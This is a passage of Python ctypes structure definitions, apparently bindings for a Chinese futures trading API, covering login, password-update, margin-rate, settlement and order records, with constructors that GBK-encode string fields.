self.UserID = UserID.encode("GBK")
if UserName:
self.UserName = UserName.encode("GBK")
if UserType:
self.UserType = UserType.encode("GBK")
if IsActive:
self.IsActive = IsActive
if IsUsingOTP:
self.IsUsingOTP = IsUsingOTP
if IsAuthForce:
self.IsAuthForce = IsAuthForce
class BrokerUserPassword(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("Password", c_char_Array_41),
("LastUpdateTime", c_char_Array_17),
("LastLoginTime", c_char_Array_17),
("ExpireDate", c_char_Array_9),
("WeakExpireDate", c_char_Array_9),
]
def __init__(self, BrokerID=None, UserID=None, Password=None, LastUpdateTime=None, LastLoginTime=None, ExpireDate=None, WeakExpireDate=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if LastUpdateTime:
self.LastUpdateTime = LastUpdateTime.encode("GBK")
if LastLoginTime:
self.LastLoginTime = LastLoginTime.encode("GBK")
if ExpireDate:
self.ExpireDate = ExpireDate.encode("GBK")
if WeakExpireDate:
self.WeakExpireDate = WeakExpireDate.encode("GBK")
class BrokerUserFunction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("BrokerFunctionCode", c_char),
]
def __init__(self, BrokerID=None, UserID=None, BrokerFunctionCode=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if BrokerFunctionCode:
self.BrokerFunctionCode = BrokerFunctionCode.encode("GBK")
class TraderOffer(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
("ParticipantID", c_char_Array_11),
("Password", c_char_Array_41),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("TraderConnectStatus", c_char),
("ConnectRequestDate", c_char_Array_9),
("ConnectRequestTime", c_char_Array_9),
("LastReportDate", c_char_Array_9),
("LastReportTime", c_char_Array_9),
("ConnectDate", c_char_Array_9),
("ConnectTime", c_char_Array_9),
("StartDate", c_char_Array_9),
("StartTime", c_char_Array_9),
("TradingDay", c_char_Array_9),
("BrokerID", c_char_Array_11),
("MaxTradeID", c_char_Array_21),
("MaxOrderMessageReference", c_char_Array_7),
]
def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallID=None, OrderLocalID=None, TraderConnectStatus=None, ConnectRequestDate=None, ConnectRequestTime=None, LastReportDate=None, LastReportTime=None, ConnectDate=None, ConnectTime=None, StartDate=None, StartTime=None, TradingDay=None, BrokerID=None, MaxTradeID=None, MaxOrderMessageReference=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if TraderConnectStatus:
self.TraderConnectStatus = TraderConnectStatus.encode("GBK")
if ConnectRequestDate:
self.ConnectRequestDate = ConnectRequestDate.encode("GBK")
if ConnectRequestTime:
self.ConnectRequestTime = ConnectRequestTime.encode("GBK")
if LastReportDate:
self.LastReportDate = LastReportDate.encode("GBK")
if LastReportTime:
self.LastReportTime = LastReportTime.encode("GBK")
if ConnectDate:
self.ConnectDate = ConnectDate.encode("GBK")
if ConnectTime:
self.ConnectTime = ConnectTime.encode("GBK")
if StartDate:
self.StartDate = StartDate.encode("GBK")
if StartTime:
self.StartTime = StartTime.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if MaxTradeID:
self.MaxTradeID = MaxTradeID.encode("GBK")
if MaxOrderMessageReference:
self.MaxOrderMessageReference = MaxOrderMessageReference.encode("GBK")
class SettlementInfo(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("SequenceNo", c_int),
("Content", c_char_Array_501),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, TradingDay=None, SettlementID=None, BrokerID=None, InvestorID=None, SequenceNo=None, Content=None, AccountID=None, CurrencyID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if Content:
self.Content = Content.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class InstrumentMarginRateAdjust(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
("IsRelative", c_int),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
if IsRelative:
self.IsRelative = IsRelative
class ExchangeMarginRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeMarginRateAdjust(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InstrumentID", c_char_Array_31),
("HedgeFlag", c_char),
("LongMarginRatioByMoney", c_double),
("LongMarginRatioByVolume", c_double),
("ShortMarginRatioByMoney", c_double),
("ShortMarginRatioByVolume", c_double),
("ExchLongMarginRatioByMoney", c_double),
("ExchLongMarginRatioByVolume", c_double),
("ExchShortMarginRatioByMoney", c_double),
("ExchShortMarginRatioByVolume", c_double),
("NoLongMarginRatioByMoney", c_double),
("NoLongMarginRatioByVolume", c_double),
("NoShortMarginRatioByMoney", c_double),
("NoShortMarginRatioByVolume", c_double),
]
def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, ExchLongMarginRatioByMoney=None, ExchLongMarginRatioByVolume=None, ExchShortMarginRatioByMoney=None, ExchShortMarginRatioByVolume=None, NoLongMarginRatioByMoney=None, NoLongMarginRatioByVolume=None, NoShortMarginRatioByMoney=None, NoShortMarginRatioByVolume=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if LongMarginRatioByMoney:
self.LongMarginRatioByMoney = LongMarginRatioByMoney
if LongMarginRatioByVolume:
self.LongMarginRatioByVolume = LongMarginRatioByVolume
if ShortMarginRatioByMoney:
self.ShortMarginRatioByMoney = ShortMarginRatioByMoney
if ShortMarginRatioByVolume:
self.ShortMarginRatioByVolume = ShortMarginRatioByVolume
if ExchLongMarginRatioByMoney:
self.ExchLongMarginRatioByMoney = ExchLongMarginRatioByMoney
if ExchLongMarginRatioByVolume:
self.ExchLongMarginRatioByVolume = ExchLongMarginRatioByVolume
if ExchShortMarginRatioByMoney:
self.ExchShortMarginRatioByMoney = ExchShortMarginRatioByMoney
if ExchShortMarginRatioByVolume:
self.ExchShortMarginRatioByVolume = ExchShortMarginRatioByVolume
if NoLongMarginRatioByMoney:
self.NoLongMarginRatioByMoney = NoLongMarginRatioByMoney
if NoLongMarginRatioByVolume:
self.NoLongMarginRatioByVolume = NoLongMarginRatioByVolume
if NoShortMarginRatioByMoney:
self.NoShortMarginRatioByMoney = NoShortMarginRatioByMoney
if NoShortMarginRatioByVolume:
self.NoShortMarginRatioByVolume = NoShortMarginRatioByVolume
class ExchangeRate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("FromCurrencyID", c_char_Array_4),
("FromCurrencyUnit", c_double),
("ToCurrencyID", c_char_Array_4),
("ExchangeRate", c_double),
]
def __init__(self, BrokerID=None, FromCurrencyID=None, FromCurrencyUnit=None, ToCurrencyID=None, ExchangeRate=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if FromCurrencyID:
self.FromCurrencyID = FromCurrencyID.encode("GBK")
if FromCurrencyUnit:
self.FromCurrencyUnit = FromCurrencyUnit
if ToCurrencyID:
self.ToCurrencyID = ToCurrencyID.encode("GBK")
if ExchangeRate:
self.ExchangeRate = ExchangeRate
class SettlementRef(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
]
def __init__(self, TradingDay=None, SettlementID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
class CurrentTime(Struct):
_fields_ = [
("CurrDate", c_char_Array_9),
("CurrTime", c_char_Array_9),
("CurrMillisec", c_int),
("ActionDay", c_char_Array_9),
]
def __init__(self, CurrDate=None, CurrTime=None, CurrMillisec=None, ActionDay=None):
super().__init__()
if CurrDate:
self.CurrDate = CurrDate.encode("GBK")
if CurrTime:
self.CurrTime = CurrTime.encode("GBK")
if CurrMillisec:
self.CurrMillisec = CurrMillisec
if ActionDay:
self.ActionDay = ActionDay.encode("GBK")
class CommPhase(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("CommPhaseNo", c_short),
("SystemID", c_char_Array_21),
]
def __init__(self, TradingDay=None, CommPhaseNo=None, SystemID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if CommPhaseNo:
self.CommPhaseNo = CommPhaseNo
if SystemID:
self.SystemID = SystemID.encode("GBK")
class LoginInfo(Struct):
_fields_ = [
("FrontID", c_int),
("SessionID", c_int),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("LoginDate", c_char_Array_9),
("LoginTime", c_char_Array_9),
("IPAddress", c_char_Array_16),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("SystemName", c_char_Array_41),
("PasswordDeprecated", c_char_Array_41),
("MaxOrderRef", c_char_Array_13),
("SHFETime", c_char_Array_9),
("DCETime", c_char_Array_9),
("CZCETime", c_char_Array_9),
("FFEXTime", c_char_Array_9),
("MacAddress", c_char_Array_21),
("OneTimePassword", c_char_Array_41),
("INETime", c_char_Array_9),
("IsQryControl", c_int),
("LoginRemark", c_char_Array_36),
("Password", c_char_Array_41),
]
def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None, LoginDate=None, LoginTime=None, IPAddress=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, SystemName=None, PasswordDeprecated=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, MacAddress=None, OneTimePassword=None, INETime=None, IsQryControl=None, LoginRemark=None, Password=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if LoginDate:
self.LoginDate = LoginDate.encode("GBK")
if LoginTime:
self.LoginTime = LoginTime.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if SystemName:
self.SystemName = SystemName.encode("GBK")
if PasswordDeprecated:
self.PasswordDeprecated = PasswordDeprecated.encode("GBK")
if MaxOrderRef:
self.MaxOrderRef = MaxOrderRef.encode("GBK")
if SHFETime:
self.SHFETime = SHFETime.encode("GBK")
if DCETime:
self.DCETime = DCETime.encode("GBK")
if CZCETime:
self.CZCETime = CZCETime.encode("GBK")
if FFEXTime:
self.FFEXTime = FFEXTime.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if OneTimePassword:
self.OneTimePassword = OneTimePassword.encode("GBK")
if INETime:
self.INETime = INETime.encode("GBK")
if IsQryControl:
self.IsQryControl = IsQryControl
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
class LogoutAll(Struct):
_fields_ = [
("FrontID", c_int),
("SessionID", c_int),
("SystemName", c_char_Array_41),
]
def __init__(self, FrontID=None, SessionID=None, SystemName=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if SystemName:
self.SystemName = SystemName.encode("GBK")
class FrontStatus(Struct):
_fields_ = [
("FrontID", c_int),
("LastReportDate", c_char_Array_9),
("LastReportTime", c_char_Array_9),
("IsActive", c_int),
]
def __init__(self, FrontID=None, LastReportDate=None, LastReportTime=None, IsActive=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
if LastReportDate:
self.LastReportDate = LastReportDate.encode("GBK")
if LastReportTime:
self.LastReportTime = LastReportTime.encode("GBK")
if IsActive:
self.IsActive = IsActive
class UserPasswordUpdate(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("OldPassword", c_char_Array_41),
("NewPassword", c_char_Array_41),
]
def __init__(self, BrokerID=None, UserID=None, OldPassword=None, NewPassword=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OldPassword:
self.OldPassword = OldPassword.encode("GBK")
if NewPassword:
self.NewPassword = NewPassword.encode("GBK")
class InputOrder(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("UserForceClose", c_int),
("IsSwapOrder", c_int),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, IsSwapOrder=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if UserForceClose:
self.UserForceClose = UserForceClose
if IsSwapOrder:
self.IsSwapOrder = IsSwapOrder
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class Order(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("OrderLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OrderSysID", c_char_Array_21),
("OrderSource", c_char),
("OrderStatus", c_char),
("OrderType", c_char),
("VolumeTraded", c_int),
("VolumeTotal", c_int),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("ActiveTime", c_char_Array_9),
("SuspendTime", c_char_Array_9),
("UpdateTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ActiveTraderID", c_char_Array_21),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("UserForceClose", c_int),
("ActiveUserID", c_char_Array_16),
("BrokerOrderSeq", c_int),
("RelativeOrderSysID", c_char_Array_21),
("ZCETotalTradedVolume", c_int),
("IsSwapOrder", c_int),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, UserForceClose=None, ActiveUserID=None, BrokerOrderSeq=None, RelativeOrderSysID=None, ZCETotalTradedVolume=None, IsSwapOrder=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if OrderSource:
self.OrderSource = OrderSource.encode("GBK")
if OrderStatus:
self.OrderStatus = OrderStatus.encode("GBK")
if OrderType:
self.OrderType = OrderType.encode("GBK")
if VolumeTraded:
self.VolumeTraded = VolumeTraded
if VolumeTotal:
self.VolumeTotal = VolumeTotal
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if ActiveTime:
self.ActiveTime = ActiveTime.encode("GBK")
if SuspendTime:
self.SuspendTime = SuspendTime.encode("GBK")
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ActiveTraderID:
self.ActiveTraderID = ActiveTraderID.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if UserForceClose:
self.UserForceClose = UserForceClose
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerOrderSeq:
self.BrokerOrderSeq = BrokerOrderSeq
if RelativeOrderSysID:
self.RelativeOrderSysID = RelativeOrderSysID.encode("GBK")
if ZCETotalTradedVolume:
self.ZCETotalTradedVolume = ZCETotalTradedVolume
if IsSwapOrder:
self.IsSwapOrder = IsSwapOrder
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExchangeOrder(Struct):
_fields_ = [
("OrderPriceType", c_char),
("Direction", c_char),
("CombOffsetFlag", c_char_Array_5),
("CombHedgeFlag", c_char_Array_5),
("LimitPrice", c_double),
("VolumeTotalOriginal", c_int),
("TimeCondition", c_char),
("GTDDate", c_char_Array_9),
("VolumeCondition", c_char),
("MinVolume", c_int),
("ContingentCondition", c_char),
("StopPrice", c_double),
("ForceCloseReason", c_char),
("IsAutoSuspend", c_int),
("BusinessUnit", c_char_Array_21),
("RequestID", c_int),
("OrderLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OrderSysID", c_char_Array_21),
("OrderSource", c_char),
("OrderStatus", c_char),
("OrderType", c_char),
("VolumeTraded", c_int),
("VolumeTotal", c_int),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("ActiveTime", c_char_Array_9),
("SuspendTime", c_char_Array_9),
("UpdateTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ActiveTraderID", c_char_Array_21),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
super().__init__()
if OrderPriceType:
self.OrderPriceType = OrderPriceType.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if CombOffsetFlag:
self.CombOffsetFlag = CombOffsetFlag.encode("GBK")
if CombHedgeFlag:
self.CombHedgeFlag = CombHedgeFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeTotalOriginal:
self.VolumeTotalOriginal = VolumeTotalOriginal
if TimeCondition:
self.TimeCondition = TimeCondition.encode("GBK")
if GTDDate:
self.GTDDate = GTDDate.encode("GBK")
if VolumeCondition:
self.VolumeCondition = VolumeCondition.encode("GBK")
if MinVolume:
self.MinVolume = MinVolume
if ContingentCondition:
self.ContingentCondition = ContingentCondition.encode("GBK")
if StopPrice:
self.StopPrice = StopPrice
if ForceCloseReason:
self.ForceCloseReason = ForceCloseReason.encode("GBK")
if IsAutoSuspend:
self.IsAutoSuspend = IsAutoSuspend
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if RequestID:
self.RequestID = RequestID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
